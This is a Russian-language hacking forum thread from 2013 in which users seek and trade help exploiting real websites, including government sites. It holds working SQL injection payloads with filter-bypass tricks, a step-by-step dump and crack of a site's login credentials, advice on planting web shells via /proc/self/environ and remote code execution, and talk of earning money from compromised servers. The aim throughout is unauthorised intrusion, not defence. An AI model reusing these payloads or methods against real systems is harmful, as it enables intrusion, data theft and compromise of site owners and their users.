Просмотр полной версии : Ваши вопросы по уязвимостям.
Имеется доступ в site/mysql/scripts/setup.php. pma 2.11.11.3. Как получить доступ к бд ?
как тут раскрутить тогда?
_http://www.orehi.net.ua/component/option,com_fireboard/Itemid,43/func,view'/id,9/view,threaded/catid,3/
Evil_Genius
22.01.2013, 18:07
Собственно нужна помощь:
1) Имею скуль "MySQL error based"
2) Вот пример скули, при которой у меня выдает название Базы данных сайта
site.ru/catalog/type/0/1+and(select+1+from(select+count(*),concat((select +(select+concat(0x7e,0x27,database(),0x27,0x7e))+f rom+`information_schema`.tables+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
3) Как мне использую данную скуль прочитать etc/passwd ?
4) Как залить шелл через скуль имея полный путь до сайта и file_priv=Y
Сбербанк
23.01.2013, 21:43
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.
winstrool
23.01.2013, 22:49
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.
SELECT req, id FROM table_name WHERE `link` = '1' and (SUBSTRING((SELECT version()),1,1))=5#' AND `count` > 0
Что мешает крутить блиндем?
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.
Попробуйте метод с name_const, очень часто выручает в случаях где надо выполнять запрос без пробелов в Error-Based!
justonline
26.01.2013, 01:48
юзер вводит, допустим, имя и сохрняет настройки, обновляет страничку - подгружается js скрипт, который формирует табличку с его именем через innerhtml. мы можем через xss в DOM объекте подгрузить произвольный скрипт? у меня не получилос( только косвенно... через инпутовский автофокус.
2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?
Интересная скуля (помогите)
Имеется ссылка вида :
_http://site.com/news.php?page=0
Добавляю кавычку и появляется вот что
http://s001.radikal.ru/i193/1301/ce/e0c4c0a2a41dt.jpg (http://radikal.ru/F/s001.radikal.ru/i193/1301/ce/e0c4c0a2a41d.png.html)
ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!
Имеется ссылка вида :
_http://site.com/news.php?page=0
Добавляю кавычку и появляется вот что
http://s001.radikal.ru/i193/1301/ce/e0c4c0a2a41dt.jpg (http://radikal.ru/F/s001.radikal.ru/i193/1301/ce/e0c4c0a2a41d.png.html)
ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!
Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.
А по сабжу кури Это (https://antichat.live/threads/43966/)
Помойму там в лимит инекция и ниче ты там не раскрутишь.
Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.
А по сабжу кури
Это (https://antichat.live/threads/43966/)
Помойму там в лимит инекция и ниче ты там не раскрутишь.
Очень смешно.Я там уже курил и не смог ничего сделать!
Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.
Очень смешно.Я там уже курил и не смог ничего сделать!
Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.
помочь и сделать- не одно и тоже.
Sat-hacker
26.01.2013, 19:41
Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.
Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.
Биржы ссылок, гонять трафик, просто продавать шеллы и т.д.
А вообще на ачате была статья про монетизацию шеллов, достаточно было бы воспользоваться поиском:
/thread220472.html (https://antichat.live/threads/220472/)
skier529
26.01.2013, 23:55
Приветствую.
Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.
Пример обращения к php-скрипту:
http://site.ru/pochta.php?login=ya@ya.ru&parol=1111111
Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...
Приветствую.
Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.
Пример обращения к php-скрипту:
http://site.ru/pochta.php?login=ya@ya.ru&parol=1111111
Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...
Во-первых, по ващим словам, это SQL инъекция, а не PHP.
Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.
2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?
UPD
allow_url_fopen on
post_max_size 8M
max_file_uploads 20
upload_max_filesize 10M
функцией пыха copy тоже не удается создается файл с размером нормальным ,но открываю ,а там пусто.
Раньше подобные сервани тоже попадились ,но там все решалось просто бэкдор=>wget .... ,а на винде такая трабла 1 раз.
skier529
27.01.2013, 12:54
Во-первых, по ващим словам, это SQL инъекция, а не PHP.
Запись идет в TXT-файл.
Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.
Пример вот: logins-vk.3dn.ru/video465423567-4583112.html
По клику на кнопку войти все данные из заполненной формы передаются сюда:
upmozgoff.ru/log.php
Сами параметры:email и pass
Запись идет в TXT-файл.
Пример вот: logins-vk.3dn.ru/video465423567-4583112.html
По клику на кнопку войти все данные из заполненной формы передаются сюда:
upmozgoff.ru/log.php
Сами параметры:
email
и
pass
Это обычный фэйк, который пишет инфу с введенной формы. Ничего с этим, вы не сделаете
romasjanXXL
27.01.2013, 14:44
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз
Издеваетесь? Проще простого...Совсем народ оборзел.
http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product
Есть скуля с правами ROOT
Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
Что можно сделать чтобы порутать данный серв?
Есть скуля с правами ROOT
Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
Что можно сделать чтобы порутать данный серв?
Может для начала залить шелл? Ищи админку.
Может для начала залить шелл? Ищи админку.
ищу просто уже вариантов нету
LelouchMe
27.01.2013, 19:36
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1
Place: GET
Parameter: news_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3
a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(
RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia
zZ
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x
51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc
вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23
пробелы ток убери
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
%0afrom table_name
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
попробуй /**/from/**/table_name--
попробуй /**/from/**/table_name--
SpaceWeb и это режет.
Там только %0a вместо порбелов помогает.
Добрый вечер.
Нашел уязвимость подобную этой
/showthread.php?t=10915
В общем проблема такая.
Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?
Добрый вечер.
Нашел уязвимость подобную этой
/showthread.php?t=10915
В общем проблема такая.
Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?
если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (список файлов в папке (http://ua2.php.net/manual/ru/function.readdir.php) или залить свой кодес (http://ua2.php.net/manual/ru/function.file-put-contents.php) ). лично я не вижу в этой особой проблемы.
можно ли обойти такой фильтр
if (strpos($_GET['f'], '..') === false)
{
$a = dirname(__FILE__);
echo file_get_contents( $a . $_GET['f']);
}
я так понимаю нужен такой символ между точками который не должен нарушать сработку
конструкции .X./ в nix системах
тогда он пройдет через фильтр
либо замена точек на что то другое еквивалентное им
если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (
список файлов в папке (http://ua2.php.net/manual/ru/function.readdir.php)
или
залить свой кодес (http://ua2.php.net/manual/ru/function.file-put-contents.php)
). лично я не вижу в этой особой проблемы.
Не получилось через opendir.
Пример как вставлял:
&cmd=opendir("../");&highlight='.eval($_GET[cmd]).'
ничего не выводит..
можно ли обойти такой фильтр
if (strpos($_GET['f'], '..') === false)
{
$a = dirname(__FILE__);
echo file_get_contents( $a . $_GET['f']);
}
я так понимаю нужен такой символ между точками который не должен нарушать сработку
конструкции .X./ в nix системах
тогда он пройдет через фильтр
либо замена точек на что то другое еквивалентное им
https://rdot.org/forum/showpost.php?p=3323&postcount=16 - в помощь.
версию вывести возможно тут?
_http://vkontakte.dj/index.php?option=com_fireboard&Itemid=41&catid=9&id=3378&func=view'
https://rdot.org/forum/showpost.php?p=3323&postcount=16
- в помощь.
я уже пробовал ети методы они не помогают
но в описании функции file_get_contents есть интересное
цитата с http://php.su/functions/?f=file_get_contents&choice=info
Замечание: Если вы открываете URI содержащий спецсимволы, такие как пробел, вам нужно закодировать URI при помощи urlencode().
из етого следует что функция file_get_contents в принципе должна понимать урл кодированую строку пути
но по факту что то не работает
ProFiLeR
29.01.2013, 20:21
Говорю по факту, что есть, на данный момент:
1) самописный движок
2) ссылка типа index.php?id=hats
3) MySQL запрос не генерируется
4) id используется в условии if'a ( if( $_GET['id'] == "hats" ) {…} )
теперь вопрос, можно ли скормить параметру id спецсимвол ' (одинарную ковычку) и завершить if со своим последующим кодом, поставя знак комментария после своего кода, чтобы последующий код не мешал
Например:
1) .../index.php?id=hats'] == 'hats' && function(){ мой_код; return true;} ) { //
2) тоесть, чтобы код изменился с
if( $_GET['id'] == 'hats' ) {
на
if( 'hats' == 'hats' && function(){ мой_код; return true;} ) { // == "hats" ) {
P.S. извините, что не тегую, т.к. пишу с мобильного
mironich
29.01.2013, 20:31
ProFiLeR, нет.
ProFiLeR
30.01.2013, 00:00
ProFiLeR
, нет.
Жаль, значит придется ждать, когда перелистывание страниц сделают и SQLinj попробовать.
Я думал, что мой способ сработает, так как PHP интерпретируемый язык, но оказалось, что нет (не сработает).
justonline
30.01.2013, 00:52
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?
LelouchMe
30.01.2013, 03:37
ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1
как правильно составлять запрос...?
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?
Нужен весь запрос, или хотя бы урл.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.
LelouchMe
30.01.2013, 12:33
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84
'and(1)='1 TRUE
'and(2)='1 FALSE
Режутся пробелы. Можно юзать только беспробельные варианты.
Ещё чуток покручу - выложу тут запросы.
UPD.
'and(extractvalue(1,concat(0x3a,(select(@@version) ))))='
XPATH syntax error: ':5.1.49-3'
'and(extractvalue(1,concat(0x3a,(select(database() )))))='
XPATH syntax error: ':lib_bd'
LelouchMe
30.01.2013, 14:06
XPATH syntax error:
То есть дальше посимвольный перебор...?
плюсую...)+
То есть дальше посимвольный перебор...?
плюсую...)+
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
LelouchMe
30.01.2013, 15:32
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...
Короче по такой схеме крутить я так понял:
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+3,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+4,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,login,password)+from+users1+l imit+0,1)))--
или как тут
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос
:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат
:
5.1.53
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос
:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1
Результат
:
customsnew.users
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос
:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_nam e)from(information_schema.columns)where`table_name `='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат
:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя
Запрос
:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from (users)where(id=1)))))='1
Результат
:
olga
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1
:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)f rom(users)where(id=1)))))='1
Запрос 2
:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(passwo rd)from(users)where(id=1)),32,1))))='1
Результат
:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.
Результат
:
olga:olga11
LelouchMe
30.01.2013, 22:45
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
zloy_fantom
01.02.2013, 23:19
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
А что делать, если /proc/self/environ выглядит так:
NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULN ULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNUL
Т.е., прочитать я его могу, но, кажется, что-то с ним не так
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
там пхп не установлен походу
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
catlist[0]=brainyfuck123')||eval("echo 123;");//
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть
panfilov1991
03.02.2013, 00:26
http://www.golowar.ru/news.php?id=67&page='
пишет:
SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1
Проверил сайт, можно ли считать это уязвимостью?
Как дальше её раскрутить чтоб исправить!
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
catlist[0]=brainyfuck123')||eval("echo 123;");//
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD:
Форум почему-то убирает кавычку перед строкой
brainyfuck123')
, знайте что она там есть
Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.
panfilov1991
03.02.2013, 16:32
не подскажите как раскрутить?
http://www.golowar.ru/news.php?id=67&page='
SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1
перепробовал всё, результат одна и та же таблица
не подскажите как раскрутить?
http://www.golowar.ru/news.php?id=67&page='
перепробовал всё, результат одна и та же таблица
Никак, intval().
panfilov1991
03.02.2013, 22:19
Никак, intval().
то есть в базу не как не пробиться?
BlackIce
03.02.2013, 22:47
Not Acceptable
___http://plainfieldsportsnews.com/news.php?id=2%29%29+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
Not Acceptable
http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
BlackIce
04.02.2013, 00:37
http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
only error based ?
only error based ?
Религия не позволяет использовать Error-Based ? Тот же вывод, в чём проблемы то ? Какая то особая ситуация ?
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Стоит WP на сервере там, вывести пароль не могу, в чем проблема?
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Table 'wp.wp_users' doesn't exist
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Стоит WP на сервере там, вывести пароль не могу, в чем проблема?
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Table 'wp.wp_users' doesn't exist
Table 'wp.wp_users' doesn't exist
Table 'wp.wp_users' doesn't exist
Так-то она есть
GET /main.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Duplicate entry 'wp:wp_users' for key 'group_key'
Так-то она есть
GET /main.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Duplicate entry 'wp:wp_users' for key 'group_key'
Обрами название бд и таблицы апострофами
`wp`.`wp_users`
BlackIce
07.02.2013, 19:25
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?
ничего
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?
http://clip2net.com/clip/m201037/1360416311-clip-17kb.png
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?
http://clip2net.com/clip/m201037/1360416311-clip-17kb.png
Попробуй с99 залить, возможно он будет работать
c99 вообще не заливается... дело в том, что я пытаюсь залить через
Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />
и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются
c99 вообще не заливается... дело в том, что я пытаюсь залить через
Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />
и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются
Так можешь вписать вверху index.php?
Click";} else {die("err");}}?>
'); ?>
foma9999
10.02.2013, 07:31
Как можно залиться, если доступа к табле юзеров нет?
http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+
Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
Известен юзер: masha_elitdress@localhost
Пробовал через char - не вышло.
В админку не попасть, хэши не брутятся.
Пытаюсь залиться через SQL.
Как можно залиться, если доступа к табле юзеров нет?
http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+
Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
Известен юзер: masha_elitdress@localhost
Пробовал через char - не вышло.
В админку не попасть, хэши не брутятся.
Пытаюсь залиться через SQL.
сам же ответил на свой вопрос.
если file_priv нету или mq=on,
то через иньекцию залиться не получится.
Не могу выполнить ни одну команду в консоле, пишет Unable to execute command
OC Linux Kernel 2.6.32
zloy_fantom
10.02.2013, 18:05
Нашел и хочу скачать образ системы на сайте (доступно через directory traversal), но acunetix выдает ошибку, не могу мол так много качать и сбрасывает соединение (как повысить лимит, не нашел), если скормить ссылку браузеру, он выдает ахинею (возможно, с потерей информации) и при сохранении ее в файл образ не собирается. У разных браузеров файл получается разного размера, так что этот путь неверен. Flash Get ругается на ссылку и не хочет качать, естественно, ведь она имеет вид site?id=etc/linux.img
Может кто знает, какой проге надо это безобразие скормить, чтобы нормально скачалось?
Спасибо
wget site?id=etc/linux.img -O linux.img
zloy_fantom
10.02.2013, 19:51
wget site?id=etc/linux.img -O linux.img
Спасибо, получилось, только образ все равно не собирается почему-то (собирал, используя R-studio)
http://www.personalguide.ru/news/page32
Возможно ли раскрутить?
Возможно ли раскрутить?
допустим можно.
что дальше?
Возможно ли раскрутить?
Можно. Например так
_ttp://www.personalguide.ru/news/page33_'and(select*from(select+name_const(version( ),1),name_const(version(),1))a)='1/
Duplicate column name '5.3.7-MariaDB-mariadb116~squeeze-log'
Yan.Total
13.02.2013, 17:59
https://site.com/cgi-bin/fnc/drop_flag.pl?id=91&l=&s=&shop_id=%5c
DBD::mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '91'' at line...
Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /
Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /
Сайт покажи =/
подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'
подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'
Это можно сделать
_http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'
FunOfGun
16.02.2013, 01:19
Здравствуйте, подскажите как можно раскрутить такие скули:
http://www.timesworld24.com/cat-news-details.php?id=%20'+union(sElect+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17)+--+ //без валидного id отдает ошибку sql
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает
http://www.daviddeltredici.com/worksbycat.php%3Fid=-6+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17+--+ //404 отдает, не mysql?
Заарнее благодарен
Здравствуйте, подскажите как можно раскрутить такие скули:
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает
Заарнее благодарен
